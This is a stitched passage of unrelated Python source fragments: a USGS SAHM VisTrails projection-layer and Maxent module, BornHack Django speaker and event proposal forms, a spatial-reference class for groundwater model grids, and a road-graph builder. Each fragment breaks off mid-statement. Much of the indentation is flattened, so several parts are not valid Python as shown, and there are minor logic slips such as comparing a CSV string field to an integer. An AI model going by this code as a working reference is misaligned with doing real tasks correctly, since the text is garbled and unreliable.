the PARC module internally on the inputs. Outputs from the ProjectionLayers module will possess
matching coordinate systems, cell sizes, and extents and do not need to be run through PARC
before being used downstream in the workflow.)
Six parameters can be set by the user:
1. Directory Crosswalk CSV: This is a .csv file containing two columns designating
the layers that should be swapped out in the projected model. The first column
contains a list of the full paths to the predictor layers used to develop the original
model that will be replaced in the projection process. The second column contains the
full paths to the new predictor layers that will substitute the respective layers used
in the original model. Each original layer in the first column should be paired with
its replacement in the second column (e.g., Column 1 = C:\ModelLayers\Precipitation1980.tif,
Column 2 = C:\ModelLayers\Precipitation2000.tif). In the case of any file used to develop
the first model that is not expressly listed in the Directory Crosswalk CSV with a
replacement, the original file will be used in the new model projection. The module
anticipates a header row in this .csv file (thus, the first row of data will be ignored).
2. File List CSV: This is a .csv file containing the list of predictor files used to
develop the first model. Effectively, this file will be updated based on the information
provided in the directory crosswalk .csv and used as the input to the training process
for the projected model. The output of the PARC module from the first model iteration
should be used as the input to this parameter.
3. Model (available only to users at the FORT): This parameter allows VisTrail users
running the SAHM package on site at the USGS Science Center in Fort Collins (FORT) to
specify one of three models to use for the projected model run ("CCCMA," "CSIRO,"
or "hadcm3").
4. Scenario (available only to users at the FORT): This parameter allows VisTrail
users running the SAHM package on site at the USGS Science Center in Fort Collins
(FORT) to specify one of two scenarios for the projected model run ("A2a" or "B2b").
5. Template: This parameter allows a user to specify the new template layer to be used
in the projected model run. The template layer is a raster data layer with a defined
coordinate system, a known cell size, and an extent that defines the (new) study area.
This raster layer serves as the template for all the other inputs in the analysis. All
additional raster layers used in the analysis will be resampled and reprojected as
needed to match the template, snapped to the template, and clipped to have an extent
that matches the template. Users should ensure that all the layers used for the projected
analysis have coverage within the extent of the template layer.
6. Year (available only to users at the FORT): This parameter allows VisTrail users
running the SAHM package on site at the USGS Science Center in Fort Collins (FORT)
to specify one of three years to use for the projected model run ("2020," "2050," or "2080").
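The core substitution step described under the Directory Crosswalk CSV parameter, replacing each original predictor-layer path with its projection-target counterpart and leaving unlisted paths unchanged, can be sketched as follows (paths are hypothetical):

```python
def swap_layers(layer_paths, crosswalk):
    """Apply [original, replacement] crosswalk pairs to a list of layer paths.

    Paths with no crosswalk entry are kept as-is, matching the module's
    documented behaviour for layers not listed in the crosswalk CSV.
    """
    out = []
    for path in layer_paths:
        for old, new in crosswalk:
            if old in path:
                path = path.replace(old, new)
                break
        out.append(path)
    return out

layers = [r"C:\ModelLayers\Precipitation1980.tif", r"C:\ModelLayers\Elevation.tif"]
crosswalk = [[r"C:\ModelLayers\Precipitation1980.tif", r"C:\ModelLayers\Precipitation2000.tif"]]
print(swap_layers(layers, crosswalk))  # Precipitation is swapped; Elevation is unchanged
```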
'''
_input_ports = [('RastersWithPARCInfoCSV', '(gov.usgs.sahm:RastersWithPARCInfoCSV:Other)'),
('templateLayer', '(gov.usgs.sahm:TemplateLayer:DataInput)'),
('model', '(edu.utah.sci.vistrails.basic:String)'),
('scenario', '(edu.utah.sci.vistrails.basic:String)'),
('year', '(edu.utah.sci.vistrails.basic:String)'),
('directoryCrosswalkCSV', '(edu.utah.sci.vistrails.basic:File)')
]
_output_ports = [("MDS", "(gov.usgs.sahm:MergedDataSet:Other)")]
def compute(self):
models = ['CCCMA', 'CSIRO', 'hadcm3']
        scenarios = ['A2a', 'B2b']
years = ['2020', '2050', '2080']
writetolog("\nRunning make Projection Layers", True)
inputCSV = self.force_get_input('RastersWithPARCInfoCSV').name
if self.has_input('templateLayer'):
template = self.force_get_input('templateLayer').name
else:
template = '' #we'll get a template below
fromto = []
climargs = {}
for input in ['model', 'scenario', 'year']:
if self.has_input(input):
climargs[input] = self.force_get_input(input)
        if climargs != {} and sorted(climargs.keys()) != ['model', 'scenario', 'year']:
            #they did not supply one of each; not going to fly
            raise ModuleError(self, "All of model, scenario, and year must be supplied if any are used.")
        elif climargs != {}:
            #they specified an alternate climate scenario; add it to our list to search for
fromto.append([r'K:\GIS_LIBRARY\Climate\WorldClim\BioclimaticVariables\bio_30s_esri\bio',
os.path.join('I:\WorldClim_Future_Climate\RenamedBILs',
climargs['model'], climargs['scenario'], climargs['year'])])
if self.has_input('directoryCrosswalkCSV'):
            crosswalkCSV = csv.reader(open(self.force_get_input('directoryCrosswalkCSV').name, 'r'))
            crosswalkCSV.next() #skip the header row
            for row in crosswalkCSV:
                fromto.append([row[0], row[1]])
del crosswalkCSV
#write out the outputs to an empty MDS file (just the header is needed to PARC the outputs)
inCSV = csv.reader(open(inputCSV, 'r'))
inCSV.next() #skip header
workingCSV = utils.mknextfile(prefix='tmpFilesToPARC_', suffix='.csv')
tmpCSV = csv.writer(open(workingCSV, 'wb'))
tmpCSV.writerow(["FilePath", "Categorical", "Resampling", "Aggregation"])
outHeader1 = ['x', 'y', 'response']
outHeader2 = ['', '', '']
outHeader3 = ['', '', '']
output_dname = utils.mknextdir(prefix='ProjectionLayers_')
for row in inCSV:
if template == '':
template = row[0]
fileShortName = utils.getShortName(row[0])
if row[1] == 1:
outHeader1.append(fileShortName + '_categorical')
else:
outHeader1.append(fileShortName)
outHeader2.append('1')
outHeader3.append(os.path.join(output_dname, fileShortName + '.tif'))
origFile = row[4]
newOrigFile = origFile
for lookup in fromto:
if lookup[0] in origFile:
newOrigFile = origFile.replace(lookup[0], lookup[1])
tmpCSV.writerow([newOrigFile,] + row[1:4])
del tmpCSV
#PARC the files here
ourPARC = parc.PARC()
if configuration.verbose:
ourPARC.verbose = True
writetolog(" output_dname=" + output_dname, False, False)
ourPARC.outDir = output_dname
ourPARC.inputsCSV = workingCSV
ourPARC.template = template
try:
ourPARC.parcFiles()
except TrappedError as e:
raise ModuleError(self, e.message)
except :
utils.informative_untrapped_error(self, "PARC")
#loop through our workingCSV and format it into an MDS header
#outputMDS = utils.mknextfile(prefix='ProjectionLayersMDS_', suffix = '.csv')
outputMDS = os.path.join(output_dname, 'ProjectionLayersMDS.csv')
outCSV = csv.writer(open(outputMDS, 'wb'))
outCSV.writerow(outHeader1)
outCSV.writerow(outHeader2)
outCSV.writerow(outHeader3)
output_file = utils.create_file_module(outputMDS)
self.set_output("MDS", output_file)
writetolog("Finished Select Projection Layers widget", True)
#class ClimateModel(String):
# _input_ports = [('value', '(gov.usgs.sahm:ClimateModel:Other)')]
# _output_ports = [('value_as_string', '(edu.utah.sci.vistrails.basic:String)', True)]
# _widget_class = build_enum_widget('ClimateModel',
# ['CCCMA', 'CSIRO', 'hadcm3'])
#
# @staticmethod
# def get_widget_class():
# return ClimateModel._widget_class
#
#class ClimateScenario(String):
# _input_ports = [('value', '(gov.usgs.sahm:ClimateScenario:Other)')]
# _output_ports = [('value_as_string', '(edu.utah.sci.vistrails.basic:String)', True)]
# _widget_class = build_enum_widget('ClimateScenario',
# ['A2a', 'B2b'])
#
# @staticmethod
# def get_widget_class():
# return ClimateScenario._widget_class
#
#class ClimateYear(String):
# _input_ports = [('value', '(gov.usgs.sahm:ClimateYear:Other)')]
# _output_ports = [('value_as_string', '(edu.utah.sci.vistrails.basic:String)', True)]
# _widget_class = build_enum_widget('ClimateYear',
# ['2020', '2050', '2080'])
#
# @staticmethod
# def get_widget_class():
# return ClimateYear._widget_class
class MAXENT(Module):
_output_ports = [("lambdas", "(edu.utah.sci.vistrails.basic:File)"),
("report", "(edu.utah.sci.vistrails.basic:File)"),
("roc", "(edu.utah.sci.vistrails.basic:File)")]
def compute(self):
global maxent_path
ourMaxent = MaxentRunner.MAXENTRunner()
ourMaxent.outputDir = utils.mknextdir(prefix='maxentFiles_')
ourMaxent.inputMDS = self.force_get_input('inputMDS').name
ourMaxent.maxentpath = maxent_path
MaxentArgsCSV = utils.mknextfile(prefix='MaxentArgs', suffix='.csv')
argWriter = csv.writer(open(MaxentArgsCSV, 'wb'))
argWriter.writerow(['parameter','value'])
for port in self._input_ports:
#print port
            if port[0] != 'inputMDS' and port[0] != 'projectionlayers':
if self.has_input(port[0]):
port_val = self.get_input(port[0])
if port[1] == "(edu.utah.sci.vistrails.basic:Boolean)":
port_val = str(port_val).lower()
elif (port[1] == "(edu.utah.sci.vistrails.basic:Path)" or \
port[1] == "(edu.utah.sci.vistrails.basic:File)"):
port_val = port_val.name
argWriter.writerow([port[0], port_val])
else:
#print " has no input "
kwargs = port[2]
#print kwargs
try:
if port[1] == "(edu.utah.sci.vistrails.basic:Boolean)":
default = kwargs['defaults'][2:-2].lower()
else:
default = kwargs['defaults'][2:-2]
#args[port[0]] = default
argWriter.writerow([port[0], default])
except KeyError:
pass
if self.has_input('projectionlayers'):
value = self.force_get_input_list('projectionlayers')
projlayers = ','.join([path.name for path in value])
argWriter.writerow(['projectionlayers', projlayers])
del argWriter
ourMaxent.argsCSV = MaxentArgsCSV
ourMaxent.logger = utils.getLogger()
try:
ourMaxent.run()
except TrappedError as e:
raise ModuleError(self, e.message)
except:
utils.informative_untrapped_error(self, | |
import logging
from django import forms
from django.core.exceptions import ImproperlyConfigured
from .models import Event, EventProposal, EventTrack, SpeakerProposal
logger = logging.getLogger("bornhack.%s" % __name__)
class SpeakerProposalForm(forms.ModelForm):
"""
The SpeakerProposalForm. Takes a list of EventTypes in __init__,
and changes fields accordingly if the list has 1 element.
"""
class Meta:
model = SpeakerProposal
fields = [
"name",
"email",
"biography",
"needs_oneday_ticket",
"submission_notes",
"event_conflicts",
]
    def __init__(self, camp, event_type=None, matrix=None, *args, **kwargs):
        """
        Initialise the form and adapt it based on event_type.
        """
        matrix = matrix or {}  # avoid the mutable-default-argument pitfall
        super().__init__(*args, **kwargs)
# only show events from this camp
self.fields["event_conflicts"].queryset = Event.objects.filter(
track__camp=camp,
event_type__support_speaker_event_conflicts=True,
)
if matrix:
# add speaker availability fields
for date in matrix.keys():
# do we need a column for this day?
if matrix[date]:
# loop over the daychunks for this day
for daychunk in matrix[date]:
if matrix[date][daychunk]:
# add the field
self.fields[
matrix[date][daychunk]["fieldname"]
] = forms.BooleanField(required=False)
# add it to Meta.fields too
self.Meta.fields.append(matrix[date][daychunk]["fieldname"])
# adapt form based on EventType?
if not event_type:
# we have no event_type to customize the form, use the default form
return
if event_type.name == "Debate":
# fix label and help_text for the name field
self.fields["name"].label = "Guest Name"
self.fields[
"name"
].help_text = "The name of a debate guest. Can be a real name or an alias."
# fix label and help_text for the email field
self.fields["email"].label = "Guest Email"
self.fields[
"email"
            ].help_text = "The email for this guest. Will default to the logged-in user's email if left empty."
            # fix label and help_text for the biography field
self.fields["biography"].label = "Guest Biography"
self.fields["biography"].help_text = "The biography of the guest."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Guest Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this guest. Only visible to yourself and the BornHack organisers."
# no free tickets for debates
del self.fields["needs_oneday_ticket"]
elif event_type.name == "Lightning Talk":
# fix label and help_text for the name field
self.fields["name"].label = "Speaker Name"
self.fields[
"name"
].help_text = "The name of the speaker. Can be a real name or an alias."
# fix label and help_text for the email field
self.fields["email"].label = "Speaker Email"
self.fields[
"email"
            ].help_text = "The email for this speaker. Will default to the logged-in user's email if left empty."
            # fix label and help_text for the biography field
self.fields["biography"].label = "Speaker Biography"
self.fields["biography"].help_text = "The biography of the speaker."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Speaker Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this speaker. Only visible to yourself and the BornHack organisers."
# no free tickets for lightning talks
del self.fields["needs_oneday_ticket"]
elif event_type.name == "Music Act":
# fix label and help_text for the name field
self.fields["name"].label = "Artist Name"
self.fields[
"name"
].help_text = "The name of the artist. Can be a real name or artist alias."
# fix label and help_text for the email field
self.fields["email"].label = "Artist Email"
self.fields[
"email"
            ].help_text = "The email for this artist. Will default to the logged-in user's email if left empty."
            # fix label and help_text for the biography field
self.fields["biography"].label = "Artist Description"
self.fields["biography"].help_text = "The description of the artist."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Artist Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this artist. Only visible to yourself and the BornHack organisers."
# no oneday tickets for music acts
del self.fields["needs_oneday_ticket"]
elif event_type.name == "Talk" or event_type.name == "Keynote":
# fix label and help_text for the name field
self.fields["name"].label = "Speaker Name"
self.fields[
"name"
].help_text = "The name of the speaker. Can be a real name or an alias."
# fix label and help_text for the email field
self.fields["email"].label = "Speaker Email"
self.fields[
"email"
].help_text = "The email for this speaker. Will default to the logged-in user's email if left empty."
# fix label and help_text for the biography field
self.fields["biography"].label = "Speaker Biography"
self.fields["biography"].help_text = "The biography of the speaker."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Speaker Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this speaker. Only visible to yourself and the BornHack organisers."
elif event_type.name == "Workshop":
# fix label and help_text for the name field
self.fields["name"].label = "Host Name"
self.fields[
"name"
].help_text = (
"The name of the workshop host. Can be a real name or an alias."
)
# fix label and help_text for the email field
self.fields["email"].label = "Host Email"
self.fields[
"email"
].help_text = "The email for the host. Will default to the logged-in user's email if left empty."
# fix label and help_text for the biography field
self.fields["biography"].label = "Host Biography"
self.fields["biography"].help_text = "The biography of the host."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Host Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this host. Only visible to yourself and the BornHack organisers."
# no free tickets for workshops
del self.fields["needs_oneday_ticket"]
elif event_type.name == "Recreational Event":
# fix label and help_text for the name field
self.fields["name"].label = "Host Name"
self.fields["name"].help_text = "Can be a real name or an alias."
# fix label and help_text for the email field
self.fields["email"].label = "Host Email"
self.fields[
"email"
].help_text = "The email for the host. Will default to the logged-in user's email if left empty."
# fix label and help_text for the biography field
self.fields["biography"].label = "Host Biography"
self.fields["biography"].help_text = "The biography of the host."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Host Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this host. Only visible to yourself and the BornHack organisers."
# no free tickets for recreational events
del self.fields["needs_oneday_ticket"]
elif event_type.name == "Meetup":
# fix label and help_text for the name field
self.fields["name"].label = "Host Name"
self.fields[
"name"
].help_text = "The name of the meetup host. Can be a real name or an alias."
# fix label and help_text for the email field
self.fields["email"].label = "Host Email"
self.fields[
"email"
].help_text = "The email for the host. Will default to the logged-in user's email if left empty."
# fix label and help_text for the biography field
self.fields["biography"].label = "Host Biography"
self.fields["biography"].help_text = "The biography of the host."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Host Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this host. Only visible to yourself and the BornHack organisers."
# no free tickets for meetups
del self.fields["needs_oneday_ticket"]
else:
raise ImproperlyConfigured(
f"Unsupported event type '{event_type.name}', don't know which form class to use"
)
class EventProposalForm(forms.ModelForm):
"""
The EventProposalForm. Takes an EventType in __init__ and changes fields accordingly.
"""
slides_url = forms.URLField(
label="Slides URL", help_text="Add a URL to your slides.", required=False
)
class Meta:
model = EventProposal
fields = [
"title",
"abstract",
"allow_video_recording",
"duration",
"tags",
"slides_url",
"submission_notes",
"track",
"use_provided_speaker_laptop",
]
def clean_duration(self):
"""Make sure duration has been specified, and make sure it is not too long"""
if not self.cleaned_data["duration"]:
raise forms.ValidationError("Please specify a duration.")
if (
self.event_type.event_duration_minutes
and self.cleaned_data["duration"] > self.event_type.event_duration_minutes
):
raise forms.ValidationError(
f"Please keep duration under {self.event_type.event_duration_minutes} minutes."
)
return self.cleaned_data["duration"]
def clean_track(self):
track = self.cleaned_data["track"]
# TODO: make sure the track is part of the current camp, needs camp as form kwarg to verify
return track
def __init__(self, camp, event_type=None, matrix=None, *args, **kwargs):
# initialise form
super().__init__(*args, **kwargs)
# we need event_type for cleaning later
self.event_type = event_type
TALK = "Talk"
LIGHTNING_TALK = "Lightning Talk"
DEBATE = "Debate"
MUSIC_ACT = "Music Act"
RECREATIONAL_EVENT = "Recreational Event"
WORKSHOP = "Workshop"
MEETUP = "Meetup"
# disable the empty_label for the track select box
self.fields["track"].empty_label = None
self.fields["track"].queryset = EventTrack.objects.filter(camp=camp)
# make sure video_recording checkbox defaults to checked
self.fields["allow_video_recording"].initial = True
if event_type.name not in [TALK, LIGHTNING_TALK]:
# Only talk or lightning talk should show the slides_url field
del self.fields["slides_url"]
# better placeholder text for duration field
self.fields["duration"].label = f"{event_type.name} Duration"
if event_type.event_duration_minutes:
self.fields[
"duration"
].help_text = f"Please enter the duration of this {event_type.name} (in minutes, max {event_type.event_duration_minutes})"
self.fields["duration"].widget.attrs[
"placeholder"
in [delr, delc]:
if isinstance(delrc, float) or isinstance(delrc, int):
msg = (
"delr and delc must be arrays or sequences equal in "
"length to the number of rows/columns."
)
raise TypeError(msg)
self.delc = np.atleast_1d(np.array(delc)).astype(
np.float64
) # * length_multiplier
self.delr = np.atleast_1d(np.array(delr)).astype(
np.float64
) # * length_multiplier
if self.delr.sum() == 0 or self.delc.sum() == 0:
if xll is None or yll is None:
msg = (
"Warning: no grid spacing. "
"The lower-left corner offset calculation requires "
"delr and delc arguments. Origin will be set to "
"upper-left"
)
warnings.warn(msg, PyemuWarning)
xll, yll = None, None
# xul, yul = None, None
self._lenuni = lenuni
self._proj4_str = proj4_str
#
self._epsg = epsg
# if epsg is not None:
# self._proj4_str = getproj4(self._epsg)
# self.prj = prj
# self._wkt = None
# self.crs = CRS(prj=prj, epsg=epsg)
self.supported_units = ["feet", "meters"]
self._units = units
self._length_multiplier = length_multiplier
self._reset()
self.set_spatialreference(xul, yul, xll, yll, rotation)
@property
def xll(self):
if self.origin_loc == "ll":
xll = self._xll if self._xll is not None else 0.0
elif self.origin_loc == "ul":
# calculate coords for lower left corner
xll = self._xul - (
np.sin(self.theta) * self.yedge[0] * self.length_multiplier
)
return xll
@property
def yll(self):
if self.origin_loc == "ll":
yll = self._yll if self._yll is not None else 0.0
elif self.origin_loc == "ul":
# calculate coords for lower left corner
yll = self._yul - (
np.cos(self.theta) * self.yedge[0] * self.length_multiplier
)
return yll
@property
def xul(self):
if self.origin_loc == "ll":
# calculate coords for upper left corner
xul = self._xll + (
np.sin(self.theta) * self.yedge[0] * self.length_multiplier
)
if self.origin_loc == "ul":
# calculate coords for lower left corner
xul = self._xul if self._xul is not None else 0.0
return xul
@property
def yul(self):
if self.origin_loc == "ll":
# calculate coords for upper left corner
yul = self._yll + (
np.cos(self.theta) * self.yedge[0] * self.length_multiplier
)
if self.origin_loc == "ul":
# calculate coords for lower left corner
yul = self._yul if self._yul is not None else 0.0
return yul
@property
def proj4_str(self):
proj4_str = None
if self._proj4_str is not None:
if "epsg" in self._proj4_str.lower():
if "init" not in self._proj4_str.lower():
proj4_str = "+init=" + self._proj4_str
else:
proj4_str = self._proj4_str
# set the epsg if proj4 specifies it
tmp = [i for i in self._proj4_str.split() if "epsg" in i.lower()]
self._epsg = int(tmp[0].split(":")[1])
else:
proj4_str = self._proj4_str
elif self.epsg is not None:
proj4_str = "+init=epsg:{}".format(self.epsg)
return proj4_str
@property
def epsg(self):
# don't reset the proj4 string here
# because proj4 attribute may already be populated
# (with more details than getprj would return)
# instead reset proj4 when epsg is set
# (on init or setattr)
return self._epsg
# @property
# def wkt(self):
# if self._wkt is None:
# if self.prj is not None:
# with open(self.prj) as src:
# wkt = src.read()
# elif self.epsg is not None:
# wkt = getprj(self.epsg)
# else:
# return None
# return wkt
# else:
# return self._wkt
@property
def lenuni(self):
return self._lenuni
def _parse_units_from_proj4(self):
units = None
try:
# need this because preserve_units doesn't seem to be
# working for complex proj4 strings. So if an
# epsg code was passed, we have no choice, but if a
# proj4 string was passed, we can just parse it
proj_str = self.proj4_str
# if "EPSG" in self.proj4_str.upper():
# import pyproj
#
# crs = pyproj.Proj(self.proj4_str,
# preserve_units=True,
# errcheck=True)
# proj_str = crs.srs
# else:
# proj_str = self.proj4_str
# http://proj4.org/parameters.html#units
# from proj4 source code
# "us-ft", "0.304800609601219", "U.S. Surveyor's Foot",
# "ft", "0.3048", "International Foot",
if "units=m" in proj_str:
units = "meters"
elif (
"units=ft" in proj_str
or "units=us-ft" in proj_str
or "to_meters:0.3048" in proj_str
):
units = "feet"
return units
except Exception:
if self.proj4_str is not None:
print(" could not parse units from {}".format(self.proj4_str))
@property
def units(self):
if self._units is not None:
units = self._units.lower()
else:
units = self._parse_units_from_proj4()
if units is None:
# print("warning: assuming SpatialReference units are meters")
units = "meters"
assert units in self.supported_units
return units
@property
def length_multiplier(self):
"""
Attempt to identify multiplier for converting from
model units to sr units, defaulting to 1.
"""
lm = None
if self._length_multiplier is not None:
lm = self._length_multiplier
else:
if self.model_length_units == "feet":
if self.units == "meters":
lm = 0.3048
elif self.units == "feet":
lm = 1.0
elif self.model_length_units == "meters":
if self.units == "feet":
lm = 1 / 0.3048
elif self.units == "meters":
lm = 1.0
elif self.model_length_units == "centimeters":
if self.units == "meters":
lm = 1 / 100.0
elif self.units == "feet":
lm = 1 / 30.48
else: # model units unspecified; default to 1
lm = 1.0
return lm
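The conversion logic in `length_multiplier` above can be sketched as a standalone lookup table. This is a hypothetical helper, not part of the class; the real property also consults `self._length_multiplier` first, and this sketch collapses the unspecified-units branch to a plain default of 1.0.

```python
# Hypothetical sketch of the length_multiplier logic above: the factor
# converts from model length units to spatial-reference units,
# defaulting to 1.0 when the pair is not recognised.
def length_multiplier(model_units, sr_units):
    table = {
        ("feet", "meters"): 0.3048,
        ("feet", "feet"): 1.0,
        ("meters", "feet"): 1 / 0.3048,
        ("meters", "meters"): 1.0,
        ("centimeters", "meters"): 1 / 100.0,
        ("centimeters", "feet"): 1 / 30.48,
    }
    return table.get((model_units, sr_units), 1.0)
```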
@property
def model_length_units(self):
return self.lenuni_text[self.lenuni]
@property
def bounds(self):
"""
Return bounding box in shapely order.
"""
xmin, xmax, ymin, ymax = self.get_extent()
return xmin, ymin, xmax, ymax
@staticmethod
def load(namefile=None, reffile="usgs.model.reference"):
"""
Attempts to load spatial reference information from
the following files (in order):
1) usgs.model.reference
2) NAM file (header comment)
3) SpatialReference.default dictionary
"""
reffile = os.path.join(os.path.split(namefile)[0], reffile)
d = SpatialReference.read_usgs_model_reference_file(reffile)
if d is not None:
return d
d = SpatialReference.attribs_from_namfile_header(namefile)
if d is not None:
return d
else:
return SpatialReference.defaults
@staticmethod
def attribs_from_namfile_header(namefile):
# check for reference info in the nam file header
d = SpatialReference.defaults.copy()
d["source"] = "namfile"
if namefile is None:
return None
header = []
with open(namefile, "r") as f:
for line in f:
if not line.startswith("#"):
break
header.extend(
line.strip().replace("#", "").replace(",", ";").split(";")
)
for item in header:
if "xul" in item.lower():
try:
d["xul"] = float(item.split(":")[1])
except Exception:
print(" could not parse xul in {}".format(namefile))
elif "yul" in item.lower():
try:
d["yul"] = float(item.split(":")[1])
except Exception:
print(" could not parse yul in {}".format(namefile))
elif "rotation" in item.lower():
try:
d["rotation"] = float(item.split(":")[1])
except Exception:
print(" could not parse rotation in {}".format(namefile))
elif "proj4_str" in item.lower():
try:
proj4_str = ":".join(item.split(":")[1:]).strip()
if proj4_str.lower() == "none":
proj4_str = None
d["proj4_str"] = proj4_str
except Exception:
print(" could not parse proj4_str in {}".format(namefile))
elif "start" in item.lower():
try:
d["start_datetime"] = item.split(":")[1].strip()
except Exception:
print(" could not parse start in {}".format(namefile))
# spatial reference length units
elif "units" in item.lower():
d["units"] = item.split(":")[1].strip()
# model length units
elif "lenuni" in item.lower():
d["lenuni"] = int(item.split(":")[1].strip())
# multiplier for converting from model length units to sr length units
elif "length_multiplier" in item.lower():
d["length_multiplier"] = float(item.split(":")[1].strip())
return d
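The header parsing in `attribs_from_namfile_header` above can be sketched in isolation: each leading `#` comment line is split into `key:value` items on `;` (with `,` treated as `;`). This is a minimal sketch, not the full method; the key names shown are just two of the recognised fields.

```python
# Minimal sketch of the namfile-header parsing above: collect items
# from leading "#" comment lines, then pick out known "key:value"
# fields. Only xul and rotation are handled here for illustration.
def parse_header_items(lines):
    items = []
    for line in lines:
        if not line.startswith("#"):
            break  # header comments end at the first non-comment line
        items.extend(line.strip().replace("#", "").replace(",", ";").split(";"))
    d = {}
    for item in items:
        if "xul" in item.lower():
            d["xul"] = float(item.split(":")[1])
        elif "rotation" in item.lower():
            d["rotation"] = float(item.split(":")[1])
    return d
```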
@staticmethod
def read_usgs_model_reference_file(reffile="usgs.model.reference"):
"""
read spatial reference info from the usgs.model.reference file
https://water.usgs.gov/ogw/policy/gw-model/modelers-setup.html
"""
ITMUNI = {
0: "undefined",
1: "seconds",
2: "minutes",
3: "hours",
4: "days",
5: "years",
}
itmuni_values = {v: k for k, v in ITMUNI.items()}
d = SpatialReference.defaults.copy()
d["source"] = "usgs.model.reference"
# discard default to avoid confusion with epsg code if entered
d.pop("proj4_str")
if os.path.exists(reffile):
with open(reffile) as fref:
for line in fref:
if len(line) > 1:
if line.strip()[0] != "#":
info = line.strip().split("#")[0].split()
if len(info) > 1:
d[info[0].lower()] = " ".join(info[1:])
d["xul"] = float(d["xul"])
d["yul"] = float(d["yul"])
d["rotation"] = float(d["rotation"])
# convert the model.reference text to a lenuni value
# (these are the model length units)
if "length_units" in d.keys():
d["lenuni"] = SpatialReference.lenuni_values[d["length_units"]]
if "time_units" in d.keys():
d["itmuni"] = itmuni_values[d["time_units"]]
if "start_date" in d.keys():
start_datetime = d.pop("start_date")
if "start_time" in d.keys():
start_datetime += " {}".format(d.pop("start_time"))
d["start_datetime"] = start_datetime
if "epsg" in d.keys():
try:
d["epsg"] = int(d["epsg"])
except Exception as e:
raise Exception("error reading epsg code from file:\n" + str(e))
# this prioritizes epsg over proj4 if both are given
# (otherwise 'proj4' entry will be dropped below)
elif "proj4" in d.keys():
d["proj4_str"] = d["proj4"]
# drop any other items that aren't used in sr class
d = {
k: v
for k, v in d.items()
if k.lower() in SpatialReference.defaults.keys()
or k.lower() in {"epsg", "start_datetime", "itmuni", "source"}
}
return d
else:
return None
def __setattr__(self, key, value):
reset = True
if key == "delr":
super(SpatialReference, | |
import numpy as np
import math
import sys
import pickle
def Coord2Pixels(lat, lon, min_lat, min_lon, max_lat, max_lon, sizex, sizey):
#print(max_lat, min_lat, sizex)
ilat = sizex - int((lat-min_lat) / ((max_lat - min_lat)/sizex))
#ilat = int((lat-min_lat) / ((max_lat - min_lat)/sizex))
ilon = int((lon-min_lon) / ((max_lon - min_lon)/sizey))
return ilat, ilon
def distance(p1, p2):
a = p1[0] - p2[0]
b = (p1[1] - p2[1])*math.cos(math.radians(p1[0]))
return np.sqrt(a*a + b*b)
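The `distance()` above is an equirectangular approximation in degrees: the longitude difference is scaled by the cosine of the latitude so that one unit of distance covers roughly the same ground length in both axes. A self-contained sketch of the same formula:

```python
import math

# Equirectangular approximation, as in distance() above: scale the
# longitude difference by cos(latitude) before taking the Euclidean norm.
def approx_distance(p1, p2):
    dlat = p1[0] - p2[0]
    dlon = (p1[1] - p2[1]) * math.cos(math.radians(p1[0]))
    return math.hypot(dlat, dlon)

# One degree of longitude at 60 degrees latitude spans about half the
# ground distance of one degree at the equator.
```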
class RoadGraph:
def __init__(self, filename=None, region = None):
self.nodeHash = {} # [tree_idx*10000000 + local_id] -> id
self.nodeHashReverse = {}
self.nodes = {} # id -> [lat,lon]
self.edges = {} # id -> [n1, n2]
self.nodeLink = {} # id -> list of next node
self.nodeID = 0
self.edgeID = 0
self.edgeHash = {} # [nid1 * 10000000 + nid2] -> edge id
self.edgeScore = {}
self.nodeTerminate = {}
self.nodeScore = {}
self.nodeLocations = {}
if filename is not None:
dumpDat = pickle.load(open(filename, "rb"))
forest = dumpDat[1]
self.forest = forest
tid = 0
for t in forest:
for n in t:
idthis = tid*10000000 + n['id']
thislat = n['lat']
thislon = n['lon']
if region is not None:
if thislat < region[0] or thislon < region[1] or thislat > region[2] or thislon > region[3]:
continue
#if n['edgeScore'] < 7.0 : # skip low-confidence edges
#
# continue
if n['similarWith'][0] != -1:
idthis = n['similarWith'][0]*10000000 + n['similarWith'][1]
thislat = forest[n['similarWith'][0]][n['similarWith'][1]]['lat']
thislon = forest[n['similarWith'][0]][n['similarWith'][1]]['lon']
if n['OutRegion'] == 1:
self.nodeTerminate[tid*10000000+n['parent']] = 1
idparent = tid*10000000 + n['parent']
parentlat = t[n['parent']]['lat']
parentlon = t[n['parent']]['lon']
if n['parent'] == 0:
print(tid, n['id'])
self.addEdge(idparent, parentlat, parentlon, idthis, thislat, thislon)
tid += 1
def addEdge(self, nid1,lat1,lon1,nid2,lat2,lon2, reverse=False, nodeScore1 = 0, nodeScore2 = 0, edgeScore = 0): #n1d1->n1d2
if nid1 not in self.nodeHash.keys():
self.nodeHash[nid1] = self.nodeID
self.nodeHashReverse[self.nodeID] = nid1
self.nodes[self.nodeID] = [lat1, lon1]
self.nodeLink[self.nodeID] = []
#self.nodeLinkReverse[self.nodeID] = []
self.nodeScore[self.nodeID] = nodeScore1
self.nodeID += 1
if nid2 not in self.nodeHash.keys():
self.nodeHash[nid2] = self.nodeID
self.nodeHashReverse[self.nodeID] = nid2
self.nodes[self.nodeID] = [lat2, lon2]
self.nodeLink[self.nodeID] = []
#self.nodeLinkReverse[self.nodeID] = []
self.nodeScore[self.nodeID] = nodeScore2
self.nodeID += 1
localid1 = self.nodeHash[nid1]
localid2 = self.nodeHash[nid2]
if localid1 * 10000000 + localid2 in self.edgeHash.keys():
print("Duplicate edge, skipping:", nid1, nid2)
return
self.edges[self.edgeID] = [localid1, localid2]
self.edgeHash[localid1 * 10000000 + localid2] = self.edgeID
self.edgeScore[self.edgeID] = edgeScore
self.edgeID += 1
if localid2 not in self.nodeLink[localid1]:
self.nodeLink[localid1].append(localid2)
if reverse == True:
if localid2 not in self.nodeLinkReverse.keys():
self.nodeLinkReverse[localid2] = []
if localid1 not in self.nodeLinkReverse[localid2]:
